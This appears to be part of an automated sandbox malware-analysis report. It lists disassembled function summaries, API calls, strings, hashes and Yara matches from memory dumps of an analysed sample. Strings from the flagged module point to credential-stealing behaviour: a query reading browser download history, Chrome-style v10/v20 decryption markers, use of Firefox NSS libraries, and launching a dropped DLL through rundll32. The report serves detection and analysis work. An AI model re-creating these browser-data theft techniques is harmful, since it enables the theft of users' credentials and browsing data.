                                                                                                                                                                                          • misuse, xrefs: 6C51AFCE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: sqlite3_log
                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
                                                                                                                                                                                          • API String ID: 632333372-924978290
                                                                                                                                                                                          • Opcode ID: 725b2732384aa22ea0f8f918cc16d5e7a5e8a42bd8a9a451b22346c460b0aeed
                                                                                                                                                                                          • Instruction ID: 2f2fe58c22ac48b47e4185aface43628d1e5373df202afffd855a00e2141bc29
                                                                                                                                                                                          • Opcode Fuzzy Hash: 725b2732384aa22ea0f8f918cc16d5e7a5e8a42bd8a9a451b22346c460b0aeed
                                                                                                                                                                                          • Instruction Fuzzy Hash: BF91F5B5B082158FEB05CF59CC98BAAB7F1BF45314F1985A8E864ABB51D334EC05CB60
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                            • Part of subcall function 00031C4A: GetSystemTime.KERNEL32(?,00056701,?), ref: 00031C79
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                          • ShellExecuteEx.SHELL32(?), ref: 00032B84
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                                                                                                          • String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
                                                                                                                                                                                          • API String ID: 2215929589-2108736111
                                                                                                                                                                                          • Opcode ID: c1761fe5f48d2ce9dcdc228376bebc18905f8784f6c644b4d02dee0153601d60
                                                                                                                                                                                          • Instruction ID: 5e0dac0734968aa3d73cdcf8e6d7df18c11d662eff3886030000dc4322d79ff9
                                                                                                                                                                                          • Opcode Fuzzy Hash: c1761fe5f48d2ce9dcdc228376bebc18905f8784f6c644b4d02dee0153601d60
                                                                                                                                                                                          • Instruction Fuzzy Hash: 25719972D11529EBCF12EFA4EC526DEB7B8AF04300F514161F910B7157DB31AE4A8B90
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 6C44CBE8: GetCurrentProcess.KERNEL32(?,6C4131A7), ref: 6C44CBF1
                                                                                                                                                                                            • Part of subcall function 6C44CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C4131A7), ref: 6C44CBFA
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(6C49E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C44D1C5), ref: 6C43D4F2
                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(6C49E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C44D1C5), ref: 6C43D50B
                                                                                                                                                                                            • Part of subcall function 6C41CFE0: EnterCriticalSection.KERNEL32(6C49E784), ref: 6C41CFF6
                                                                                                                                                                                            • Part of subcall function 6C41CFE0: LeaveCriticalSection.KERNEL32(6C49E784), ref: 6C41D026
                                                                                                                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C44D1C5), ref: 6C43D52E
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(6C49E7DC), ref: 6C43D690
                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(6C49E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C44D1C5), ref: 6C43D751
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • lesheet" type="text/css" ><link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" ><link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global., xrefs: 6C43D793
                                                                                                                                                                                          • MOZ_CRASH(), xrefs: 6C43D4BB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                                                                                                                                                                          • String ID: MOZ_CRASH()$lesheet" type="text/css" ><link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" ><link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.
                                                                                                                                                                                          • API String ID: 3805649505-3957914486
                                                                                                                                                                                          • Opcode ID: 1b66d2f7f8d350ffc5486c4bb40330d66a6b8d6e47b6cfefa3f0393c1ecf4ecf
                                                                                                                                                                                          • Instruction ID: 3c0afbbbc939b8c57e8617fb21f7d2646cc62e637575d8ca04d99be2e240f355
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b66d2f7f8d350ffc5486c4bb40330d66a6b8d6e47b6cfefa3f0393c1ecf4ecf
                                                                                                                                                                                          • Instruction Fuzzy Hash: E451B271A047618FE768DF29C094F1ABBF1EB89714F24892EE5A9C7B44D770E804CB91
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 00028307
                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,-0000001F,00000000,?,?), ref: 0002833C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocLocal_memset
                                                                                                                                                                                          • String ID: ERROR_RUN_EXTRACTOR$v10$v20
                                                                                                                                                                                          • API String ID: 52611349-380572819
                                                                                                                                                                                          • Opcode ID: 2c274cfd2e9febf22bbd03126866f5847828f0fa6f2db684494d6a82c551b0ac
                                                                                                                                                                                          • Instruction ID: c8cd87e5fabe91b5c1939db2dda1626fbfce760126d92dfb1f0bf6d2ad8d61c7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c274cfd2e9febf22bbd03126866f5847828f0fa6f2db684494d6a82c551b0ac
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9641E3B6A01128ABCF10DFB9EC469DF3BB8AF44714F158121FD04E7281EB70DA498B90
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C44F480
                                                                                                                                                                                            • Part of subcall function 6C41F100: LoadLibraryW.KERNEL32(shell32,?,6C48D020), ref: 6C41F122
                                                                                                                                                                                            • Part of subcall function 6C41F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C41F132
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 6C44F555
                                                                                                                                                                                            • Part of subcall function 6C4214B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C421248,6C421248,?), ref: 6C4214C9
                                                                                                                                                                                            • Part of subcall function 6C4214B0: memcpy.VCRUNTIME140(?,6C421248,00000000,?,6C421248,?), ref: 6C4214EF
                                                                                                                                                                                            • Part of subcall function 6C41EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C41EEE3
                                                                                                                                                                                          • CreateFileW.KERNEL32 ref: 6C44F4FD
                                                                                                                                                                                          • GetFileInformationByHandle.KERNEL32(00000000), ref: 6C44F523
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                                                                                                                                          • String ID: \oleacc.dll
                                                                                                                                                                                          • API String ID: 2595878907-3839883404
                                                                                                                                                                                          • Opcode ID: 544192fd322e528ea214a8ce08e0b4f96745839d4cbe0852b406bcd6fe3a729e
                                                                                                                                                                                          • Instruction ID: d2cd753951dc580c73d86286f74a25120a09c03d8ec653dd9950377449dd03df
                                                                                                                                                                                          • Opcode Fuzzy Hash: 544192fd322e528ea214a8ce08e0b4f96745839d4cbe0852b406bcd6fe3a729e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 624191306097509FF720DF68C884F9AB7F4EF45329F204A1CE59583651EB70E9498B92
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_MillisecondsToInterval.NSS3(?), ref: 6C5A6E36
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5A6E57
                                                                                                                                                                                            • Part of subcall function 6C5DC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5DC2BF
                                                                                                                                                                                          • PR_MillisecondsToInterval.NSS3(?), ref: 6C5A6E7D
                                                                                                                                                                                          • PR_MillisecondsToInterval.NSS3(?), ref: 6C5A6EAA
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: IntervalMilliseconds$ErrorValue
                                                                                                                                                                                          • String ID: ndl
                                                                                                                                                                                          • API String ID: 3163584228-3837407192
                                                                                                                                                                                          • Opcode ID: 017c48020819c180f88961790c409d8d7a30c1a90587b05af8af50a219907405
                                                                                                                                                                                          • Instruction ID: 909a2b6846e31fd868f69606c1e566d0aef8b02ac383878f1d65616b8932dded
                                                                                                                                                                                          • Opcode Fuzzy Hash: 017c48020819c180f88961790c409d8d7a30c1a90587b05af8af50a219907405
                                                                                                                                                                                          • Instruction Fuzzy Hash: A931C532610712EEDB145EB9CD1439BB7A4AB4131AF100A3CD4A9D6B80EF30795ACF81
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 0002F2C7
                                                                                                                                                                                            • Part of subcall function 0004EC45: std::exception::exception.LIBCMT ref: 0004EC5A
                                                                                                                                                                                            • Part of subcall function 0004EC45: __CxxThrowException@8.LIBCMT ref: 0004EC6F
                                                                                                                                                                                            • Part of subcall function 0004EC45: std::exception::exception.LIBCMT ref: 0004EC80
                                                                                                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 0002F2E6
                                                                                                                                                                                          • _memmove.LIBCMT ref: 0002F320
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                                                                                                                                          • String ID: invalid string position$string too long
                                                                                                                                                                                          • API String ID: 3404309857-4289949731
                                                                                                                                                                                          • Opcode ID: cd466762159831fe5900563ea07a17d3e32b6bba1e7fd6cf3dc1658210c6f01d
                                                                                                                                                                                          • Instruction ID: ddddb0d2d7fbb311b63de4ac1ec82dcd4a75a26f815685a421948a6c4249c299
                                                                                                                                                                                          • Opcode Fuzzy Hash: cd466762159831fe5900563ea07a17d3e32b6bba1e7fd6cf3dc1658210c6f01d
                                                                                                                                                                                          • Instruction Fuzzy Hash: AA119E71300213AF9B04EF68E885AAAB3B5BF013A07500579F516CB282C770EA458794
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C520BDE), ref: 6C520DCB
                                                                                                                                                                                          • strrchr.VCRUNTIME140(00000000,0000005C,?,6C520BDE), ref: 6C520DEA
                                                                                                                                                                                          • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C520BDE), ref: 6C520DFC
                                                                                                                                                                                          • PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C520BDE), ref: 6C520E32
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • %s incr => %d (find lib), xrefs: 6C520E2D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: strrchr$Print_stricmp
                                                                                                                                                                                          • String ID: %s incr => %d (find lib)
                                                                                                                                                                                          • API String ID: 97259331-2309350800
                                                                                                                                                                                          • Opcode ID: 96bfd52938b7e4cc8341ac4b1ff5d8e5c82b7bf8b024021eb61acaac6b2f19c9
                                                                                                                                                                                          • Instruction ID: e157ad43a78c37b165cf0ba10ddb940d95b323de7498361e69bb3a546054a77e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 96bfd52938b7e4cc8341ac4b1ff5d8e5c82b7bf8b024021eb61acaac6b2f19c9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 68012871B01210AFE720DF259C85E17B3FCDF86608B04882ED905D7A81E762EC1486E5
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?,@]\l,00000000,?,?,6C5B6AC6,?), ref: 6C5DAC2D
                                                                                                                                                                                            • Part of subcall function 6C57ADC0: TlsGetValue.KERNEL32(?,6C55CDBB,?,6C55D079,00000000,00000001), ref: 6C57AE10
                                                                                                                                                                                            • Part of subcall function 6C57ADC0: EnterCriticalSection.KERNEL32(?,?,6C55CDBB,?,6C55D079,00000000,00000001), ref: 6C57AE24
                                                                                                                                                                                            • Part of subcall function 6C57ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C55D079,00000000,00000001), ref: 6C57AE5A
                                                                                                                                                                                            • Part of subcall function 6C57ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C55CDBB,?,6C55D079,00000000,00000001), ref: 6C57AE6F
                                                                                                                                                                                            • Part of subcall function 6C57ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C55CDBB,?,6C55D079,00000000,00000001), ref: 6C57AE7F
                                                                                                                                                                                            • Part of subcall function 6C57ADC0: TlsGetValue.KERNEL32(?,6C55CDBB,?,6C55D079,00000000,00000001), ref: 6C57AEB1
                                                                                                                                                                                            • Part of subcall function 6C57ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C55CDBB,?,6C55D079,00000000,00000001), ref: 6C57AEC9
                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?,@]\l,00000000,?,?,6C5B6AC6,?), ref: 6C5DAC44
                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,@]\l,00000000,?,?,6C5B6AC6,?), ref: 6C5DAC59
                                                                                                                                                                                          • free.MOZGLUE(8CB6FF01,6C5B6AC6,?,?,?,?,?,?,?,?,?,?,6C5C5D40,00000000,?,6C5CAAD4), ref: 6C5DAC62
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                                                                                                                          • String ID: @]\l
                                                                                                                                                                                          • API String ID: 1595327144-2352874985
                                                                                                                                                                                          • Opcode ID: 9e2748a9e01f223e6e967d315791181bfc0d19bba23429f967cc1c293d56b20a
                                                                                                                                                                                          • Instruction ID: 9f7fac823ddb7ab53f38e4931c9e2a50438faea555273095fdc4170afe732f55
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e2748a9e01f223e6e967d315791181bfc0d19bba23429f967cc1c293d56b20a
                                                                                                                                                                                          • Instruction Fuzzy Hash: D80178B56012009FEB10CF19EDC0B4677A8AB54B28F188068E8098F706D735F848CBB1
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(ntdll.dll,?,6C47C0E9), ref: 6C47C418
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C47C437
                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,6C47C0E9), ref: 6C47C44C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                          • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                                                                                                                                          • API String ID: 145871493-2623246514
                                                                                                                                                                                          • Opcode ID: 8f8db413c0f21ca7fefe0c0da4f86ed71daefb955fde98f534ff540553e35ecc
                                                                                                                                                                                          • Instruction ID: 994f31273199068ee0937ca5f7ca63981a1018e4cab350f53c4df44a65c53c08
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f8db413c0f21ca7fefe0c0da4f86ed71daefb955fde98f534ff540553e35ecc
                                                                                                                                                                                          • Instruction Fuzzy Hash: 72E0B6706127219BFFA0FF72D908F157FFCA7A6245F10411AFA0491701EBB0C0108B60
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 000294AB
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 000294C6
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpy$lstrlen$lstrcat
                                                                                                                                                                                          • String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
                                                                                                                                                                                          • API String ID: 2500673778-2241552939
                                                                                                                                                                                          • Opcode ID: bf413405b0ae6e602a63012df139c79fa556f509f7a1d7cc45c78dbf4b273b9c
                                                                                                                                                                                          • Instruction ID: 626b8f5326a002b7fe208c17e239a4de3d9d9599f48a00cbe29dbd0ea3c0d762
                                                                                                                                                                                          • Opcode Fuzzy Hash: bf413405b0ae6e602a63012df139c79fa556f509f7a1d7cc45c78dbf4b273b9c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E71C732904129EFCF02FBA4ED478DEB7B5AF04305F514160F904B7166DB60AE5A8BA1
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C52EDFD
                                                                                                                                                                                          • calloc.MOZGLUE(00000001,00000000), ref: 6C52EE64
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C52EECC
                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C52EEEB
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C52EEF6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorValuecallocfreememcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3833505462-0
                                                                                                                                                                                          • Opcode ID: c09a2b51fa98ce747926ece11fb0f7c619284b941c3dd84ea98fb3bb73da54d7
                                                                                                                                                                                          • Instruction ID: 3fcf8df56e263968d2e62e98105abed0a277ce20b41ded1fb9c83e44462fdae7
                                                                                                                                                                                          • Opcode Fuzzy Hash: c09a2b51fa98ce747926ece11fb0f7c619284b941c3dd84ea98fb3bb73da54d7
                                                                                                                                                                                          • Instruction Fuzzy Hash: FF310971600201ABDB20DF39CC84B667BF4FB46316F140629E85A87A90D779E814C7E5
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 6C41B532
                                                                                                                                                                                          • moz_xmalloc.MOZGLUE(?), ref: 6C41B55B
                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C41B56B
                                                                                                                                                                                          • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C41B57E
                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C41B58F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4244350000-0
                                                                                                                                                                                          • Opcode ID: 2b8bb569065e6112a9124d306aabe7e1553e7b4ccc0eb69b7e96ddefeffa42a0
                                                                                                                                                                                          • Instruction ID: 52e094de2542b679f49ae9328b1bf518c1941bf931bec6e4ec150dafd3cd760f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b8bb569065e6112a9124d306aabe7e1553e7b4ccc0eb69b7e96ddefeffa42a0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5021E4B1A042159BDB00DF69CC40FBABBB9FF85318F284129E958DB781E776D911C7A0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(00000000,?,6C533FFF,00000000,?,?,?,?,?,6C531A1C,00000000,00000000), ref: 6C53ADA7
                                                                                                                                                                                            • Part of subcall function 6C5914C0: TlsGetValue.KERNEL32 ref: 6C5914E0
                                                                                                                                                                                            • Part of subcall function 6C5914C0: EnterCriticalSection.KERNEL32 ref: 6C5914F5
                                                                                                                                                                                            • Part of subcall function 6C5914C0: PR_Unlock.NSS3 ref: 6C59150D
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C533FFF,00000000,?,?,?,?,?,6C531A1C,00000000,00000000), ref: 6C53ADB4
                                                                                                                                                                                            • Part of subcall function 6C5910C0: TlsGetValue.KERNEL32(?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C5910F3
                                                                                                                                                                                            • Part of subcall function 6C5910C0: EnterCriticalSection.KERNEL32(?,?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C59110C
                                                                                                                                                                                            • Part of subcall function 6C5910C0: PL_ArenaAllocate.NSS3(?,?,?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C591141
                                                                                                                                                                                            • Part of subcall function 6C5910C0: PR_Unlock.NSS3(?,?,?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C591182
                                                                                                                                                                                            • Part of subcall function 6C5910C0: TlsGetValue.KERNEL32(?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C59119C
                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(00000000,?,6C533FFF,?,?,?,?,6C533FFF,00000000,?,?,?,?,?,6C531A1C,00000000), ref: 6C53ADD5
                                                                                                                                                                                            • Part of subcall function 6C58FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C588D2D,?,00000000,?), ref: 6C58FB85
                                                                                                                                                                                            • Part of subcall function 6C58FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C58FBB1
                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C6594B0,?,?,?,?,?,?,?,?,6C533FFF,00000000,?), ref: 6C53ADEC
                                                                                                                                                                                            • Part of subcall function 6C58B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6618D0,?), ref: 6C58B095
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C533FFF), ref: 6C53AE3C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2372449006-0
                                                                                                                                                                                          • Opcode ID: a69722281a64bfc8f8f6b638edda58da0040f29df28a473bc99ae962894bbfa7
                                                                                                                                                                                          • Instruction ID: d15ce0478b9d938cf2721ca94fce80cfcc9c79a4b58f3fc29982ad0038676bcd
                                                                                                                                                                                          • Opcode Fuzzy Hash: a69722281a64bfc8f8f6b638edda58da0040f29df28a473bc99ae962894bbfa7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 71112671E00324ABEB109AA59C41BBF73AC9F9524DF044628EC5996741FB20ED5886A2
